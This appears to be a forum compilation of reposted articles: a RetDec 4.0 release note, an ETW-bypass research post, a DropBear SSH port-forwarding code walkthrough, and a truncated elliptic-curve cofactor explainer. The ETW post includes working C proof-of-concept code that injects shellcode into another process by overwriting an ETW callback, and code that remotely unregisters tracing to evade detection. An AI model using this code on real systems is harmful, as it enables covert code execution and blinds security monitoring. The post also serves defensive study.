RetDec v4.0 is out 7 days agoby Peter Matula RetDec is an open-source machine-code decompiler based on LLVM. It isn’t limited by a target architecture, operating system, or executable file format: Runs on Windows, Linux, and macOS. Supports all the major object-file formats: Windows PE, Unix ELF, macOS Mach-O. Supports all the prevailing architectures: x86, x64, arm, arm64, mips, powerpc. Since its initial public release in December 2017, we have released three other stable versions: v3.0 — The initial public release. v3.1 — Added macOS support, simplified the repository structure, reimplemented recursive traversal decoder. v3.2 — Replaced all shell scripts with Python and thus made the usage much simpler. v3.3 — Added x64 architecture, added FreeBSD support (maintainted by the community), deployed a new LLVM-IR-to-BIR converter Now, we are glad to announce a new version 4.0 release with the following major features: added arm64 architecture, added JSON output option, implemented a new build system, and implemented retdec library. See changelog for the complete list of new features, enhancements, and fixes. 1. arm64 architecture This one is clear — now you can decompile arm64 binary files with RetDec! Adding a new architecture is isolated to the capstone2llvmir library. Thus, it is doable with little knowledge about the rest of RetDec. In fact, the library already also supports mips64 and powerpc64. These aren’t yet enabled by RetDec itself because we haven’t got around to adequately test them. Any architecture included in Capstone could be implemented. We even put together a how-to-do-it wiki page so that anyone can contribute. 2. JSON output option As one would expect, RetDec by default produces a C source code as its output. This is fine for consumption by humans, but what if another program wants to make use of it? Parsing high-level-language source code isn’t trivial. Furthermore, additional meta-information may be required to enhance user experience or automated analysis — information that is hard to convey in a traditional high-level language. For this reason, we added an option to generate the output as a sequence of annotated lexer tokens. Two output formats are possible: Human-readable JSON containing proper indentation (option -f json-human). Machine-readable JSON without any indentation (option -f json). This means that if you run retdec-decompiler.py -f json-human input, you get the following output: { "tokens": [ { "addr": "0x804851c" }, { "kind": "i_var", "val": "result" }, { "addr": "0x804854c" }, { "kind": "ws", "val": " " }, { "kind": "op", "val": "=" }, { "kind": "ws", "val": " " }, { "kind": "i_var", "val": "ack" }, { "kind": "punc", "val": "(" }, { "kind": "i_var", "val": "m" }, { "kind": "ws", "val": " " }, { "kind": "op", "val": "-" }, { "kind": "ws", "val": " " }, { "kind": "l_int", "val": "1" }, { "kind": "op", "val": "," }, { "kind": "ws", "val": " " }, { "kind": "l_int", "val": "1" }, { "kind": "punc", "val": ")" }, { "kind": "punc", "val": ";" } ], "language": "C" } instead of this one: result = ack(m - 1, 1); In addition to the source-code token values, there is meta-information on token types, and even assembly instruction addresses from which these tokens were generated. The addresses are on a per-command basis at the moment, but we plan to make them even more granular in the future. See the Decompiler outputs wiki page for more details. JSON output option is currently used in RetDec’s Radare2 plugin and an upcoming IDA plugin v1.0. Feel free to use it in your projects as well. 3. New build system RetDec is a collection of libraries, executables, and resources. Chained together in a script, we get the decompiler itself — retdec-decompiler.py. But what about all the individual components? Couldn’t they be useful on their own? Most definitely they could! Until now the RetDec components weren’t easy to use. As of version 4.0, the installation contains all the resources necessary to utilize them in other CMake projects. If RetDec is installed into a standard system location (e.g. /usr), its library components can be used as simply as: find_package(retdec 4.0 REQUIRED COMPONENTS <component> [...] ) target_link_libraries(your-project PUBLIC retdec::<component> [...] ) If it isn’t installed somewhere where it can be discovered, CMake needs help before find_package() is used. There are generally two ways to do it: list(APPEND CMAKE_PREFIX_PATH ${RETDEC_INSTALL_DIR}) set(retdec_DIR ${RETDEC_INSTALL_DIR}/share/retdec/cmake) Add the RetDec installation directory to CMAKE_PREFIX_PATH Set the path to installed RetDec CMake scripts to retdec_DIR It is also possible to configure the build system to produce only the selected component(s). This can significantly speed up compilation. The desired components can be enabled at CMake-configuration time by one of these parameters: -D RETDEC_ENABLE_<component>=ON [...] -D RETDEC_ENABLE=component[,...] See Repository Overview for the list of available RetDec components, retdec-build-system-tests for component demos, and Build Instructions for the list of possible CMake options. 4. retdec library Well, now that we can use various RetDec libraries, can we use the whole RetDec decompiler as a library? Not yet. But we should! In fact, the vast majority of RetDec functionality is in libraries as it is. The retdec-decompiler.py script and other related scripts are just putting it all together. But they are kinda remnants of the past. There is no reason why even the decompilation itself couldn’t be provided by a library. Then, we could use it in various front-ends, replacing hacked-together Python scripts. Other prime users would be the already mentioned RetDec’s IDA and Radare2 plugins. We aren’t there yet, but version 4.0 moves in this direction. It adds a new library called retdec, which will eventually implement a comprehensive decompilation interface. As a first step, it currently offers a disassembling functionality. That is a full recursive traversal decoding of a given input file into an LLVM IR module and structured (functions & basic blocks) Capstone disassembly. It also provides us with a good opportunity to demonstrate most of the things this article talked about. The following source code is all that’s needed to get to a complete LLVM IR and Capstone disassembly of an input file: #include <iostream> #include <retdec/retdec/retdec.h> #include <retdec/llvm/Support/raw_ostream.h> int main(int argc, char* argv[]) { if (argc != 2) { llvm::errs() << "Expecting path to input\n"; return 1; } std::string input = argv[1]; retdec::common::FunctionSet fs; retdec::LlvmModuleContextPair llvm = retdec::disassemble(input, &fs); // Dump entire LLVM IR module. llvm::outs() << *llvm.module; // Dump functions, basic blocks, instructions. for (auto& f : fs) { llvm::outs() << f.getName() << " @ " << f << "\n"; for (auto& bb : f.basicBlocks) { llvm::outs() << "\t" << "bb @ " << bb << "\n"; // These are not only text entries. // There is a full Capstone instruction. for (auto* i : bb.instructions) { llvm::outs() << "\t\t" << retdec::common::Address(i->address) << ": " << i->mnemonic << " " << i->op_str << "\n"; } } } return 0; } The CMake script building it looks simply like this: cmake_minimum_required(VERSION 3.6) project(demo) find_package(retdec 4.0 REQUIRED COMPONENTS retdec llvm ) add_executable(demo demo.cpp) target_link_libraries(demo retdec::retdec retdec::deps::llvm ) If RetDec is installed somewhere where it can be discovered, the demo can be built simply with: cmake .. make If it is not, one option is to set the path to installed CMake scripts: cmake .. -Dretdec_DIR=$RETDEC_INSTALL_DIR/share/retdec/cmake make If we are building RetDec ourselves, we can configure CMake to enable only the retdec library with cmake .. -DRETDEC_ENABLE_RETDEC=ON. What’s next? We believe that for effective and efficient manual malware analysis it is best to selectively decompile only the interesting functions. Interact with the results, and gradually compose an understanding of the inspected binary. Such a workflow is enabled by RetDec’s IDA and Radare2 plugins, but no so much by its native one-off mode of operation. Especially when performance on medium-to-large files is still an ongoing issue. We also believe in the ever-increasing role of advanced automated malware analysis. For these reasons, RetDec will move further in the direction outlined in the previous section. Having all the decompilation functionality available in a set of libraries will enable us to build better tools for both manual and automated malware analysis. Reversing tools series With this introductory piece, we are starting a series of articles focused on engineering behind reversing. So, if you are interested in the inner workings of such tools, then do look out for new posts in here! Sursa: https://engineering.avast.io/retdec-v4-0-is-out/
-
Another method of bypassing ETW and Process Injection via ETW registration entries. Posted on April 8, 2020 by odzhan Contents Introduction Registering Providers Locating the Registration Table Parsing the Registration Table Code Redirection Disable Tracing Further Research 1. Introduction This post briefly describes some techniques used by Red Teams to disrupt detection of malicious activity by the Event Tracing facility for Windows. It’s relatively easy to find information about registered ETW providers in memory and use it to disable tracing or perform code redirection. Since 2012, wincheck provides an option to list ETW registrations, so what’s discussed here isn’t all that new. Rather than explain how ETW works and the purpose of it, please refer to a list of links here. For this post, I took inspiration from Hiding your .NET – ETW by Adam Chester that includes a PoC for EtwEventWrite. There’s also a PoC called TamperETW, by Cornelis de Plaa. A PoC to accompany this post can be found here. 2. Registering Providers At a high-level, providers register using the advapi32!EventRegister API, which is usually forwarded to ntdll!EtwEventRegister. This API validates arguments and forwards them to ntdll!EtwNotificationRegister. The caller provides a unique GUID that normally represents a well-known provider on the system, an optional callback function and an optional callback context. Registration handles are the memory address of an entry combined with table index shifted left by 48-bits. This may be used later with EventUnregister to disable tracing. The main functions of interest to us are those responsible for creating registration entries and storing them in memory. ntdll!EtwpAllocateRegistration tells us the size of the structure is 256 bytes. Functions that read and write entries tell us what most of the fields are used for. typedef struct _ETW_USER_REG_ENTRY { RTL_BALANCED_NODE RegList; // List of registration entries ULONG64 Padding1; GUID ProviderId; // GUID to identify Provider PETWENABLECALLBACK Callback; // Callback function executed in response to NtControlTrace PVOID CallbackContext; // Optional context SRWLOCK RegLock; // SRWLOCK NodeLock; // HANDLE Thread; // Handle of thread for callback HANDLE ReplyHandle; // Used to communicate with the kernel via NtTraceEvent USHORT RegIndex; // Index in EtwpRegistrationTable USHORT RegType; // 14th bit indicates a private ULONG64 Unknown[19]; } ETW_USER_REG_ENTRY, *PETW_USER_REG_ENTRY; ntdll!EtwpInsertRegistration tells us where all the entries are stored. For Windows 10, they can be found in a global variable called ntdll!EtwpRegistrationTable. 3. Locating the Registration Table A number of functions reference it, but none are public. EtwpRemoveRegistrationFromTable EtwpGetNextRegistration EtwpFindRegistration EtwpInsertRegistration Since we know the type of structures to look for in memory, a good old brute force search of the .data section in ntdll.dll is enough to find it. LPVOID etw_get_table_va(VOID) { LPVOID m, va = NULL; PIMAGE_DOS_HEADER dos; PIMAGE_NT_HEADERS nt; PIMAGE_SECTION_HEADER sh; DWORD i, cnt; PULONG_PTR ds; PRTL_RB_TREE rbt; PETW_USER_REG_ENTRY re; m = GetModuleHandle(L"ntdll.dll"); dos = (PIMAGE_DOS_HEADER)m; nt = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew); sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + nt->FileHeader.SizeOfOptionalHeader); // locate the .data segment, save VA and number of pointers for(i=0; i<nt->FileHeader.NumberOfSections; i++) { if(*(PDWORD)sh[i].Name == *(PDWORD)".data") { ds = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress); cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR); break; } } // For each pointer minus one for(i=0; i<cnt - 1; i++) { rbt = (PRTL_RB_TREE)&ds[i]; // Skip pointers that aren't heap memory if(!IsHeapPtr(rbt->Root)) continue; // It might be the registration table. // Check if the callback is code re = (PETW_USER_REG_ENTRY)rbt->Root; if(!IsCodePtr(re->Callback)) continue; // Save the virtual address and exit loop va = &ds[i]; break; } return va; } 4. Parsing the Registration Table ETW Dump can display information about each ETW provider in the registration table of one or more processes. The name of a provider (with exception to private providers) is obtained using ITraceDataProvider::get_DisplayName. This method uses the Trace Data Helper API which internally queries WMI. Node : 00000267F0961D00 GUID : {E13C0D23-CCBC-4E12-931B-D9CC2EEE27E4} (.NET Common Language Runtime) Description : Microsoft .NET Runtime Common Language Runtime - WorkStation Callback : 00007FFC7AB4B5D0 : clr.dll!McGenControlCallbackV2 Context : 00007FFC7B0B3130 : clr.dll!MICROSOFT_WINDOWS_DOTNETRUNTIME_PROVIDER_Context Index : 108 Reg Handle : 006C0267F0961D00 5. Code Redirection The Callback function for a provider is invoked in request by the kernel to enable or disable tracing. For the CLR, the relevant function is clr!McGenControlCallbackV2. Code redirection is achieved by simply replacing the callback address with the address of a new callback. Of course, it must use the same prototype, otherwise the host process will crash once the callback finishes executing. We can invoke a new callback using the StartTrace and EnableTraceEx API, although there may be a simpler way via NtTraceControl. // inject shellcode into process using ETW registration entry BOOL etw_inject(DWORD pid, PWCHAR path, PWCHAR prov) { RTL_RB_TREE tree; PVOID etw, pdata, cs, callback; HANDLE hp; SIZE_T rd, wr; ETW_USER_REG_ENTRY re; PRTL_BALANCED_NODE node; OLECHAR id[40]; TRACEHANDLE ht; DWORD plen, bufferSize; PWCHAR name; PEVENT_TRACE_PROPERTIES prop; BOOL status = FALSE; const wchar_t etwname[]=L"etw_injection\0"; if(path == NULL) return FALSE; // try read shellcode into memory plen = readpic(path, &pdata); if(plen == 0) { wprintf(L"ERROR: Unable to read shellcode from %s\n", path); return FALSE; } // try obtain the VA of ETW registration table etw = etw_get_table_va(); if(etw == NULL) { wprintf(L"ERROR: Unable to obtain address of ETW Registration Table.\n"); return FALSE; } printf("*********************************************\n"); printf("EtwpRegistrationTable for %i found at %p\n", pid, etw); // try open target process hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if(hp == NULL) { xstrerror(L"OpenProcess(%ld)", pid); return FALSE; } // use (Microsoft-Windows-User-Diagnostic) unless specified node = etw_get_reg( hp, etw, prov != NULL ? prov : L"{305FC87B-002A-5E26-D297-60223012CA9C}", &re); if(node != NULL) { // convert GUID to string and display name StringFromGUID2(&re.ProviderId, id, sizeof(id)); name = etw_id2name(id); wprintf(L"Address of remote node : %p\n", (PVOID)node); wprintf(L"Using %s (%s)\n", id, name); // allocate memory for shellcode cs = VirtualAllocEx( hp, NULL, plen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(cs != NULL) { wprintf(L"Address of old callback : %p\n", re.Callback); wprintf(L"Address of new callback : %p\n", cs); // write shellcode WriteProcessMemory(hp, cs, pdata, plen, &wr); // initialize trace bufferSize = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(etwname) + 2; prop = (EVENT_TRACE_PROPERTIES*)LocalAlloc(LPTR, bufferSize); prop->Wnode.BufferSize = bufferSize; prop->Wnode.ClientContext = 2; prop->Wnode.Flags = WNODE_FLAG_TRACED_GUID; prop->LogFileMode = EVENT_TRACE_REAL_TIME_MODE; prop->LogFileNameOffset = 0; prop->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES); if(StartTrace(&ht, etwname, prop) == ERROR_SUCCESS) { // save callback callback = re.Callback; re.Callback = cs; // overwrite existing entry with shellcode address WriteProcessMemory(hp, (PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback), &cs, sizeof(ULONG_PTR), &wr); // trigger execution of shellcode by enabling trace if(EnableTraceEx( &re.ProviderId, NULL, ht, 1, TRACE_LEVEL_VERBOSE, (1 << 16), 0, 0, NULL) == ERROR_SUCCESS) { status = TRUE; } // restore callback WriteProcessMemory(hp, (PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback), &callback, sizeof(ULONG_PTR), &wr); // disable tracing ControlTrace(ht, etwname, prop, EVENT_TRACE_CONTROL_STOP); } else { xstrerror(L"StartTrace"); } LocalFree(prop); VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE); } } else { wprintf(L"ERROR: Unable to get registration entry.\n"); } CloseHandle(hp); return status; } 6. Disable Tracing If you decide to examine clr!McGenControlCallbackV2 in more detail, you’ll see that it changes values in the callback context to enable or disable event tracing. For CLR, the following structure and function are used. Again, this may be defined differently for different versions of the CLR. typedef struct _MCGEN_TRACE_CONTEXT { TRACEHANDLE RegistrationHandle; TRACEHANDLE Logger; ULONGLONG MatchAnyKeyword; ULONGLONG MatchAllKeyword; ULONG Flags; ULONG IsEnabled; UCHAR Level; UCHAR Reserve; USHORT EnableBitsCount; PULONG EnableBitMask; const ULONGLONG* EnableKeyWords; const UCHAR* EnableLevel; } MCGEN_TRACE_CONTEXT, *PMCGEN_TRACE_CONTEXT; void McGenControlCallbackV2( LPCGUID SourceId, ULONG IsEnabled, UCHAR Level, ULONGLONG MatchAnyKeyword, ULONGLONG MatchAllKeyword, PVOID FilterData, PMCGEN_TRACE_CONTEXT CallbackContext) { int cnt; // if we have a context if(CallbackContext) { // and control code is not zero if(IsEnabled) { // enable tracing? if(IsEnabled == EVENT_CONTROL_CODE_ENABLE_PROVIDER) { // set the context CallbackContext->MatchAnyKeyword = MatchAnyKeyword; CallbackContext->MatchAllKeyword = MatchAllKeyword; CallbackContext->Level = Level; CallbackContext->IsEnabled = 1; // ...other code omitted... } } else { // disable tracing CallbackContext->IsEnabled = 0; CallbackContext->Level = 0; CallbackContext->MatchAnyKeyword = 0; CallbackContext->MatchAllKeyword = 0; if(CallbackContext->EnableBitsCount > 0) { ZeroMemory(CallbackContext->EnableBitMask, 4 * ((CallbackContext->EnableBitsCount - 1) / 32 + 1)); } } EtwCallback( SourceId, IsEnabled, Level, MatchAnyKeyword, MatchAllKeyword, FilterData, CallbackContext); } } There are a number of options to disable CLR logging that don’t require patching code. Invoke McGenControlCallbackV2 using EVENT_CONTROL_CODE_DISABLE_PROVIDER. Directly modify the MCGEN_TRACE_CONTEXT and ETW registration structures to prevent further logging. Invoke EventUnregister passing in the registration handle. The simplest way is passing the registration handle to ntdll!EtwEventUnregister. The following is just a PoC. BOOL etw_disable( HANDLE hp, PRTL_BALANCED_NODE node, USHORT index) { HMODULE m; HANDLE ht; RtlCreateUserThread_t pRtlCreateUserThread; CLIENT_ID cid; NTSTATUS nt=~0UL; REGHANDLE RegHandle; EventUnregister_t pEtwEventUnregister; ULONG Result; // resolve address of API for creating new thread m = GetModuleHandle(L"ntdll.dll"); pRtlCreateUserThread = (RtlCreateUserThread_t) GetProcAddress(m, "RtlCreateUserThread"); // create registration handle RegHandle = (REGHANDLE)((ULONG64)node | (ULONG64)index << 48); pEtwEventUnregister = (EventUnregister_t)GetProcAddress(m, "EtwEventUnregister"); // execute payload in remote process printf(" [ Executing EventUnregister in remote process.\n"); nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL, NULL, pEtwEventUnregister, (PVOID)RegHandle, &ht, &cid); printf(" [ NTSTATUS is %lx\n", nt); WaitForSingleObject(ht, INFINITE); // read result of EtwEventUnregister GetExitCodeThread(ht, &Result); CloseHandle(ht); SetLastError(Result); if(Result != ERROR_SUCCESS) { xstrerror(L"etw_disable"); return FALSE; } disabled_cnt++; return TRUE; } 7. Further Research I may have missed articles/tools on ETW. Feel free to email me with the details. by Matt Graeber Tampering with Windows Event Tracing: Background, Offense, and Defense ModuleMonitor by TheWover SilkETW by FuzzySec ETW Explorer., by Pavel Yosifovich EtwConsumerNT, by Petr Benes ClrGuard by Endgame. Detecting Malicious Use of .NET Part 1 Detecting Malicious Use of .NET Part 2 Hunting For In-Memory .NET Attacks Detecting Fileless Malicious Behaviour of .NET C2Agents using ETW Make ETW Great Again. Enumerating AppDomains in a remote process ETW private loggers, EtwEventRegister on w8 consumer preview, EtwEventRegister, by redplait Disable those pesky user mode etw loggers Disable ETW of the current PowerShell session Universally Evading Sysmon and ETW Sursa: https://modexp.wordpress.com/2020/04/08/red-teams-etw/
-
How Does SSH Port Forwarding Work? Apr 9, 2020 10 min read I often use the command ssh server_addr -L localport:remoteaddr:remoteport to create an SSH tunnel. This allows me, for example, to communicate with a host that is only accessible to the SSH server. You can read more about SSH port forwarding (also known as “tunneling”) here. This blog post assumes this knowledge. But what happens behind the scenes when the above-mentioned command is executed? What happens in the SSH client and server when they respond to this port forwarding instruction? In this blog post, I’ll focus on the DropBear SSH implementation and also stick to local (as opposed to remote) port forwarding. I am not describing my personal research process here, because there’s already enough information to share. Believe me TL;DR This section summarizes the process without quoting any line of code. If you wish to understand how local port forwarding works in SSH, without going into any specific implementation, this section will definitely suffice. The client creates a socket and binds it to localaddr and localport (actually, it binds a socket for each address resolved from localaddr, but let’s keep things simple). If no localaddr is specified (which is usually the case for me), the client will create a socket for localhost or all network interfaces (implementation-dependent). listen() is called on the created, bound socket. Once a connection is accepted on the socket, the client creates a channel with the socket’s file descriptor (fd) for reading and writing. Unlike sockets, channels are part of the SSH protocol and are not operating-system objects. The client then sends a message to the server, informing it of the new channel. The message includes the client’s channel identifier (index), the local address & port and the remote address & port to which the server should connect later on. When the server sees this special message, it creates a new channel. It immediately “attaches” this channel to the client’s one, using the received identifier, and sends its own identifier to the client. This way the two sides exchange channel IDs for future communication. Then, the server connects to the remote address and port which were specified in the client’s payload. If the connection succeeds, its socket is assigned to the server’s channel for both reading and writing. Data is sent and received between the sides whenever select(), which is called from the session’s main loop, returns file descriptors (sockets) that are ready for I/O operations. So just to make things clear: On the client side — a socket is connected to the local address, which is where data is read from (before sending to the server) or written to (after being received from the server). On the server side, there is another socket which is connected to the remote address. This is where data is sent to (from the client) or received from (on its way to the client). Drill-Down What follows is the specific implementation details of the DropBear SSH server and client. This part might be somewhat tedious, as it mentions many names of structs and functions, but it may help clarify steps from the TL;DR section and demonstrate them through code. Important note on links: I don’t like blog posts containing too many links, because they give me really bad FOMOs. Therefore, I decided not to link to the source code. Instead, I provide the code snippets that I find necessary, as well as the names of the different functions and structs. Client Side Setup When the client reads the command line, it parses all forwarding “rules” and adds them to a list in cli_opts.localfwds. void cli_getopts(int argc, char ** argv) { ... case 'L': // for the command-line flag "-L" opt = OPT_LOCALTCPFWD; break; ... if (opt == OPT_LOCALTCPFWD) { addforward(&argv[i][j], cli_opts.localfwds); } ... } In the client’s session loop, the function setup_localtcp() is called. This function iterates on all TCP forwarding entries that were previously added and calls cli_localtcp on each. void setup_localtcp() { ... for (iter = cli_opts.localfwds->first; iter; iter = iter->next) { /* TCPFwdEntry is the struct that holds the forwarding details - local and remote addresses and ports */ struct TCPFwdEntry * fwd = (struct TCPFwdEntry*)iter->item; ret = cli_localtcp( fwd->listenaddr, fwd->listenport, fwd->connectaddr, fwd->connectport); ... } The function cli_localtcp() creates a TCPListener entry. This entry specifies not only the forwarding details, but also the type of the channel that should be created (cli_chan_tcplocal) and the TCP type (direct). For each new TCP listener, it calls listen_tcpfwd(). static int cli_localtcp(const char* listenaddr, unsigned int listenport, const char* remoteaddr, unsigned int remoteport) { struct TCPListener* tcpinfo = NULL; int ret; tcpinfo = (struct TCPListener*)m_malloc(sizeof(struct TCPListener)); /* Assign the listening address & port, and the remote address & port*/ tcpinfo->sendaddr = m_strdup(remoteaddr); tcpinfo->sendport = remoteport; if (listenaddr) { tcpinfo->listenaddr = m_strdup(listenaddr); } else { ... tcpinfo->listenaddr = m_strdup("localhost"); ... } tcpinfo->listenport = listenport; /* Specify channel type and TCP type */ tcpinfo->chantype = &cli_chan_tcplocal; tcpinfo->tcp_type = direct; ret = listen_tcpfwd(tcpinfo, NULL); ... } Creating a Socket listen_tcpfwd() does the following: calls dropbear_listen() to start listening on the local address and port. This is where sockets are actually created and bound to the client-provided address and port. creates a new Listener object. This object contains the sockets on which listening should take place, and also specifies an “acceptor” - a callback function that is responsible for calling accept(). Each listener is constructed with the sockets that dropbear_listen() returned, and with an acceptor function named tcp_acceptor(). int listen_tcpfwd(struct TCPListener* tcpinfo, struct Listener **ret_listener) { char portstring[NI_MAXSERV]; int socks[DROPBEAR_MAX_SOCKS]; int nsocks; struct Listener *listener; char* errstring = NULL; snprintf(portstring, sizeof(portstring), "%u", tcpinfo->listenport); /* Create sockets and listen on them */ nsocks = dropbear_listen(tcpinfo->listenaddr, portstring, socks, DROPBEAR_MAX_SOCKS, &errstring, &ses.maxfd); ... /* Put the list of sockets in a new Listener object */ listener = new_listener(socks, nsocks, CHANNEL_ID_TCPFORWARDED, tcpinfo, tcp_acceptor, cleanup_tcp); ... } Creating a Channel tcp_acceptor() is responsible for accepting connections to a socket. This is where the action happens. The function creates a new channel of type cli_chan_tcplocal (for local port forwarding), then calls send_msg_channel_open_init() to: inform the server of the client’s newly-created channel; tell it to create a channel of its own. Once this CHANNEL_OPEN message is sent successfully, the client fetches the addresses and ports from the listener object, and puts them inside the payload to be sent. static void tcp_acceptor(const struct Listener *listener, int sock) { int fd; struct sockaddr_storage sa; socklen_t len; char ipstring[NI_MAXHOST], portstring[NI_MAXSERV]; struct TCPListener *tcpinfo = (struct TCPListener*)(listener->typedata); len = sizeof(sa); fd = accept(sock, (struct sockaddr*)&sa, &len); ... if (send_msg_channel_open_init(fd, tcpinfo->chantype) == DROPBEAR_SUCCESS) { char* addr = NULL; unsigned int port = 0; if (tcpinfo->tcp_type == direct) { /* "direct-tcpip" */ /* host to connect, port to connect */ addr = tcpinfo->sendaddr; port = tcpinfo->sendport; } ... /* remote ip and port */ buf_putstring(ses.writepayload, addr, strlen(addr)); buf_putint(ses.writepayload, port); /* originator ip and port */ buf_putstring(ses.writepayload, ipstring, strlen(ipstring)); buf_putint(ses.writepayload, atol(portstring)); ... } Whenever the server responds with its own channel ID - the client will be able to to send and receive data based on the specified forwarding rule. Server Side Creating a Channel (upon client’s request) The server is informed of the local port forwarding only the moment it receives the MSG_CHANNEL_OPEN message from the client. Handling this message happens in the function recv_msg_channel_open(). This function creates a new channel of type svr_chan_tcpdirect, and calls the channel initialization function, named newtcpdirect(). void recv_msg_channel_open() { ... /* get the packet contents */ type = buf_getstring(ses.payload, &typelen); remotechan = buf_getint(ses.payload); ... /* The server finds out the type of the client's channel, to create a channel of the same type ("direct-tcpip") */ for (cp = &ses.chantypes[0], chantype = (*cp); chantype != NULL; cp++, chantype = (*cp)) { if (strcmp(type, chantype->name) == 0) { break; } } /* create the channel */ channel = newchannel(remotechan, chantype, transwindow, transmaxpacket); ... /* This is where newtcpdirect is called */ if (channel->type->inithandler) { ret = channel->type->inithandler(channel); ... } ... send_msg_channel_open_confirmation(channel, channel->recvwindow, channel->recvmaxpacket); ... } Creating a Socket The function newtcpdirect() is reading the buffer ses.payload, which contains the data put there by the client beforehand: the destination host and port, and the origin host and port. With these details, the server connects to the remote host and port with connect_remote(). static int newtcpdirect(struct Channel * channel) { ... desthost = buf_getstring(ses.payload, &len); ... destport = buf_getint(ses.payload); orighost = buf_getstring(ses.payload, &len); ... origport = buf_getint(ses.payload); snprintf(portstring, sizeof(portstring), "%u", destport); /* Connect to the remote host */ channel->conn_pending = connect_remote(desthost, portstring, channel_connect_done, channel, NULL, NULL); ... } This function creates a connection object c (of type dropbear_progress_connection) in which it stores the remote address and port, a “placeholder” socket fd (-1) and a callback function named channel_connect_done(). Remember this callback for later on! struct dropbear_progress_connection *connect_remote(const char* remotehost, const char* remoteport, connect_callback cb, void* cb_data, const char* bind_address, const char* bind_port) { struct dropbear_progress_connection *c = NULL; ... /* Populate the connection object */ c = m_malloc(sizeof(*c)); c->remotehost = m_strdup(remotehost); c->remoteport = m_strdup(remoteport); c->sock = -1; c->cb = cb; c->cb_data = cb_data; list_append(&ses.conn_pending, c); ... /* c->res contains addresses resolved from the remotehost & remoteport. This is a list of addresses, for each a socket is needed. */ err = getaddrinfo(remotehost, remoteport, &hints, &c->res); if (err) { ... } else { c->res_iter = c->res; } ... return c; } As you can see in the snippet above, the connection structure is added to the list sess.conn_pending. This list will be handled in the next iteration of the session’s main loop. The connection itself is done from within connect_try_next() function which is called by set_connect_fds(). This is where the socket is practically connected to the remote host. static void connect_try_next(struct dropbear_progress_connection *c) { struct addrinfo *r; int err; int res = 0; int fastopen = 0; ... for (r = c->res_iter; r; r = r->ai_next) { dropbear_assert(c->sock == -1); c->sock = socket(r->ai_family, r->ai_socktype, r->ai_protocol); ... if (!fastopen) { res = connect(c->sock, r->ai_addr, r->ai_addrlen); } ... } ... } Assigning the Socket to the Channel The status of the connection to the remote host is checked in handle_connect_fds, also from the session loop. This is where, if the connection succeeded, its callback is invoked - remember our callback? The callback function channel_connect_done() receives the socket and the channel itself (in the user_data parameter). The function sets the socket’s fd to be the channel’s source of reading and the destination of writing. With that, all I/O is done against the remote address. Finally, a confirmation message is sent back to the client with the channel identifier. void channel_connect_done(int result, int sock, void* user_data, const char* UNUSED(errstring)) { struct Channel *channel = user_data; if (result == DROPBEAR_SUCCESS) { channel->readfd = channel->writefd = sock; ... send_msg_channel_open_confirmation(channel, channel->recvwindow, channel->recvmaxpacket); ... } ... } From this point on, there’s a connection between the server’s channel and the client’s channel. On the client side, the channel is reading/writing from/to the socket connected to the local address. On the server side, the channel reads/writes against the remote address socket. Epilogue This type of write-up is pretty difficult to write, and even more so to read. So I’m glad you survived. If you have any questions regarding the port forwarding mechanism - please don’t hesitate to reach out and ask! I think the process can be quite confusing (at least it was for me) - and I’d love to know which parts need more sharpening. It is interesting to go further and understand the session loop itself; when is reading and writing triggered? how exactly server-side and client-side channels are paired? I figured if I went into these as well - this post would become a complete RFC explanation So if you find these topics interesting, I encourage you to read the source code and get the answers. Sursa: https://ophirharpaz.github.io/posts/how-does-ssh-port-forwarding-work/
-
- 1
-
April 2020 Cofactor Explained: Clearing Elliptic Curves' dirty little secret Much of public key cryptography uses the notion of prime-order groups. We first relied on the difficulty of the Discrete Logarithm Problem. Problem was, Index Calculus makes DLP less difficult than it first seems. So we used longer and longer keys – up to 4096 bits (512 bytes) in 2020 – to keep up with increasingly efficient attacks. Elliptic curves solved that. A well chosen, safe curve can only be broken by brute force. In practice, elliptic curve keys can be as small as 32 bytes. On the other hand, elliptic curves were not exactly fast, and the maths involved many edge cases and subtle death traps. Most of those problems were addressed by Edwards curves, which have a complete addition law with no edge cases, and Montgomery curves, with a simple and fast scalar multiplication method. Those last curves however did introduced a tiny little problem: their order is not prime. (Before we dive in, be advised: this is a dense article. Don't hesitate to take the time you need to digest what you've just read and develop an intuitive understanding. Prior experience with elliptic curve scalar multiplication helps too.) Prime-order groups primer First things first: what's so great about prime-order groups? What's a group anyway? What does "order" even mean? A group is the combination of a set of elements "G", and an operation "+". The operation follows what we call the group laws. For all a and b in G, a+b is also in G (closure). For all a, b, and c in G, (a+b)+c = a+(b+c) (associativity). There's an element "0" such that for all a, 0+a = a+0 = a (identity element). For all a in G, there's an element -a such that a + -a = 0 (inverse element). Basically what you'd expect from good old addition. The order of a group is simply the number of elements in that group. To give you an example, let's take G = [0..15], and define + as binary exclusive or. All laws above can be checked. It's order is 16 (there are 16 elements). Note some weird properties. For instance, each element is its own inverse (a xor a is zero). More interesting are cyclic groups, which have a generator: an element that repeatedly added to itself can walk through the entire group (and back to itself, so it can repeat the cycle all over again). Cyclic groups are all isomorphic to the group of non-negative integers modulo the same order. Let's take for instance [0..9], with addition modulo 10. The number 1 is a generator of the group: 1 = 1 2 = 1+1 3 = 1+1+1 4 = 1+1+1+1 5 = 1+1+1+1+1 6 = 1+1+1+1+1+1 7 = 1+1+1+1+1+1+1 8 = 1+1+1+1+1+1+1+1 9 = 1+1+1+1+1+1+1+1+1 0 = 1+1+1+1+1+1+1+1+1+1 1 = 1+1+1+1+1+1+1+1+1+1+1 (next cycle starts) 2 = 1+1+1+1+1+1+1+1+1+1+1+1 etc. Not all numbers are generators of the entire group. 5 for instance can generate only 2 elements: 5, and itself. 5 = 5 0 = 5+5 5 = 5+5+5 (next cycle starts) 0 = 5+5+5+5 etc. Note: we also use the word "order" to speak of how many elements are generated by a given element. In the group [0..9], 5 "has order 2", because it can generate 2 elements. 1, 3, 7, and 9 have order 10. 2, 4, 6, and 